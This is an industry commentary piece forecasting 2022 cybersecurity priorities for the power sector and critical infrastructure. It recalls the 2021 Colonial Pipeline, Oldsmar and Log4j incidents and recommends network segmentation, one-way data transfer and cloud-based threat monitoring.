2021 was an interesting year for critical infrastructure cybersecurity, and not in a good way.
Along with the headlines we expect to see every year–ransomware attacks, newly discovered software vulnerabilities–last year gave us an unprecedented look at the real-world consequences that can follow from an attack against critical systems. Within a few weeks in May alone, we saw gas shortages caused by the Colonial Pipeline shutdown, followed by an attempt to poison the Oldsmar, Florida water supply via remote access. And the discovery of the Log4j remote code execution vulnerability in December has opened up a new world of threats that may take years to resolve.
Fortunately, the power industry was not involved in any of the year’s top cybersecurity stories, probably because it has historically led the way in developing and implementing security strategies for operational technology. But there can be no doubt that threat actors continue to seek new ways to attack and disrupt the electrical grid.
In 2022, the power industry and other critical infrastructure sectors will need to further strengthen their cyber defenses, while simultaneously taking advantage of cloud services and other technology to improve their efficiency and resilience. Here’s what to expect.
Continued Log4j Fallout
The Log4j remote code execution vulnerability will remain a primary focus for security teams in every sector of critical infrastructure. With hundreds of millions of devices potentially affected, it will be years before every vulnerable machine has been identified and remediated.
In the meantime, network segmentation will be the single most important factor in protecting vulnerable systems from malicious outsiders. If industrial devices are isolated in secure networks that threat actors cannot see and cannot access, the chances of a catastrophic attack are dramatically lower.
Secure Cloud Connectivity to Monitor Asset Performance
Given the increase of cloud connectivity and utilization, isolated OT environments are no longer a viable option for most critical infrastructure operators. When data is trapped inside facilities and cannot be accessed except by direct physical access, operators lose visibility into organization-wide device status and performance.
To maximize efficiency and plan maintenance, organizations need the ability to send data from secure OT networks to cloud-based analytics platforms. Doing this securely is the challenge, given Log4j and hundreds of other potential threats. Cybersecurity solutions are required to bridge the airgap, ensure full cybersecurity for the OT environment, and allow the flow of the required OT data for the use by the enterprise.
Look for the continued adoption of hardware-enforced one-way data transfer solutions, which allow data to travel out of a secure network while blocking all traffic from outside.
Asset Health
OT-to-cloud connectivity has other benefits as well, including helping organizations improve their security posture. By sending network data out of OT facilities (again, using secure transfer methods) to cloud-based security information and event management (SIEM) platforms, critical infrastructure operators can identify and remediate threats that might otherwise have gone unnoticed.
Cloud-based threat hunting and asset health has rapidly gained adoption in recent years, and should become even more widely used as organizations seek ways to minimize the impact of zero-day vulnerabilities and other cyber threats.
2022 is sure to have plenty of surprises in store. But with continued attention to network segmentation, secure connectivity, and proactive threat detection, the power industry can stay a step ahead of threats to the infrastructure we all depend on.